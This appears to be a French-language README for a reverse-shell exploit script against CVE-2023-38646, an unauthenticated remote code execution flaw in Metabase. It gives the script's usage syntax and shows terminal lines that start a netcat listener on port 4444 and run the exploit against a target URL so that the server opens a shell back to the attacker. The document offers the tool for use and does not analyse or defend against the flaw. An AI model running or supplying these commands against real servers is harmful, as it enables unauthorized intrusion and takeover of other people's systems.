
CVE-2023-38646 Vulnérabilité RCE non authentifiée dans Metabase
« Cette vulnérabilité, désignée sous le nom de CVE-2023-38646, permettait aux attaquants d’exécuter des commandes arbitraires sur le serveur sans nécessiter d’authentification. »
Un script rapide d’exploitation de reverse shell pour CVE-2023-38646. Je n’ai pas découvert cette vulnérabilité, j’ai simplement réalisé le script.
root@box:~/CVE-2023-38646# python3 exploit.py
_______ ________ ___ ___ ___ ____ ____ ___ __ _ _ __
/ ____\ \ / / ____| |__ \ / _ \__ \|___ \ |___ \ / _ \ / /| || | / /
| | \ \ / /| |__ ______ ) | | | | ) | __) |_____ __) | (_) |/ /_| || |_ / /_
| | \ \/ / | __|______/ /| | | |/ / |__ <______|__ < > _ <| '_ \__ _| '_ \
| |____ \ / | |____ / /_| |_| / /_ ___) | ___) | (_) | (_) | | | | (_) |
\_____| \/ |______| |____|\___/____|____/ |____/ \___/ \___/ |_| \___/
auteur: c0rnbread
crédits:
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
https://raw.githubusercontent.com/kh4sh3i/CVE-2023-38646/main/CVE-2023-38646.py
Utilisation : python3 exploit.py <url> <ip-locale> <port-local>
Exécuter en utilisant l’URL de base ainsi que l’IP et le port locaux pour le reverse shell
root@box:~/CVE-2023-38646# nc -lvnp 4444
root@box:~/CVE-2023-38646# python3 exploit.py http://example.com 10.10.10.2 4444
